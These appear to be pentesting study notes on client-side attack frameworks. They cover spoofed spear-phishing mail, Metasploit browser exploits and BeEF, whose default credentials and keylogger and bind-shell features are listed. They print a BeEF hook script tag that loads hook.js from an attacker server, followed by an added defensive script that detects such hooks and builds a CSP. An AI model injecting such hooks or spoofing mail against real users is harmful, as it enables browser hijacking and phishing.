Kali Web Penetration Testing Notes (9)
2016-06-12 01:02
Exploiting the Client Using Attack Frameworks
Spear-phishing e-mail attack: Choosing your own mail server has one distinct advantage: it allows you to spoof an e-mail address and, if the victim's mail server does not perform reverse DNS lookups, the e-mail is sure to hit the victim's mailbox.
Metasploit browser exploit
Browser Exploitation Framework (BeEF): besides exploiting XSS flaws, the tool can also make web browsers attack other websites using injected JavaScript.
The BeEF attack platform can generate and deliver payloads directly to the target web browser. What makes it an attractive tool for social engineering attacks is its range of modules and its ability to control many web browsers at the same time using something known as a hook.
BeEF consists of two major components:
A server application that manages the hooked clients, also known as zombies.
A JavaScript hook that runs in the web browser of the victim.
An example of a hook is shown in the following code. This code is injected into an HTML file that is downloaded by the web browser:
<script type="text/javascript" src="http://<BeEF_server_IP>:3000/hook.js"></script>
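From the defender's side, the hook is just a third-party script include, so it can be found by auditing served HTML and blocked with a Content-Security-Policy. The following is an added example, not part of the original notes: the allowed origins, the sample page and the address 192.0.2.10 are constructed, and the port 3000 / hook.js signature is taken from the hook line above.

```javascript
// Added example (not from the original notes). Origins and sample page are constructed.
const ALLOWED_ORIGINS = new Set(["https://shop.example", "https://cdn.shop.example"]);

// Constructed sample: two legitimate includes, one BeEF-style hook, one unknown host.
const SAMPLE_PAGE = `<html><head>
<script src="/static/app.js"></script>
<script src="https://cdn.shop.example/lib.js"></script>
<script type="text/javascript" src="http://192.0.2.10:3000/hook.js"></script>
<script src='//ads.example.net/t.js'></script>
<script>var inline = 1;</script>
</head></html>`;

// Return the src value of every <script> opening tag (quoted or bare attribute values).
function scriptSources(html) {
  const srcRe = /\ssrc\s*=\s*(?:"([^"]*)"|'([^']*)'|([^\s>]+))/i;
  const out = [];
  for (const tag of html.match(/<script\b[^>]*>/gi) || []) {
    const m = srcRe.exec(tag);
    if (m) out.push(m[1] ?? m[2] ?? m[3]);
  }
  return out;
}

// Resolve each src against the page URL and report anything suspicious.
function auditPage(html, pageUrl) {
  const findings = [];
  for (const src of scriptSources(html)) {
    let url;
    try {
      url = new URL(src, pageUrl);
    } catch {
      findings.push({ src, verdict: "unparseable" });
      continue;
    }
    // Signature from the notes: hook.js served from port 3000.
    const hookLike = url.port === "3000" && url.pathname.toLowerCase().endsWith("/hook.js");
    if (hookLike) findings.push({ src, verdict: "beef-default-hook" });
    else if (!ALLOWED_ORIGINS.has(url.origin)) findings.push({ src, verdict: "unlisted-origin" });
  }
  return findings;
}

// CSP header value that makes the browser refuse scripts from unlisted origins.
function cspHeaderValue(pageOrigin) {
  const extra = [...ALLOWED_ORIGINS].filter((o) => o !== pageOrigin);
  return ["script-src", "'self'", ...extra].join(" ");
}

console.log(auditPage(SAMPLE_PAGE, "https://shop.example/cart"));
console.log(cspHeaderValue("https://shop.example"));
```

The port and file name are only a signature for the hook as written above; the origin allowlist and the CSP are what still apply when the script is served from a different location.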
The default username and password for logging in to the web interface are both beef.
Some of the features and uses of the BeEF tool are listed as follows:
Port scanner
Key Logger
Browser information gathering
Bind shell
Network Mapping
Metasploit integration